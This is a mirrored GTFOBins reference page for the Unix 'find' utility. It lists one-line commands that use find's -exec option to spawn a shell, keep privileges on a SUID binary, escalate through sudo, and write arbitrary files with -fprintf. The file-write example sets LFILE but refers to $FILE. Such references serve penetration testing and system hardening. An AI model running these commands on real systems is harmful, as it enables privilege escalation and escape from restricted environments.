This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-02 09:49:17 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
7b2b58eab4a9b55d8c3677e4ba699808dc184950
GTFOBins.github.io
/
_gtfobins
/
find.md
B0nk3rZ
e8e9b2bc4b
Add find file-write
...
Co-authored-by: Andrea Cardaci <
cyrus.and@gmail.com
>
2023-12-02 11:25:56 +01:00
358 B
Raw
Blame
History
functions
functions
shell
suid
sudo
file-write
code
find . -exec /bin/sh ; -quit
code
./find . -exec /bin/sh -p ; -quit
code
sudo find . -exec /bin/sh ; -quit
description
code
DATA is a format string, it supports some escape sequences.
LFILE=file_to_write find / -fprintf "$FILE" DATA -quit
Reference in New Issue
View Git Blame
Copy Permalink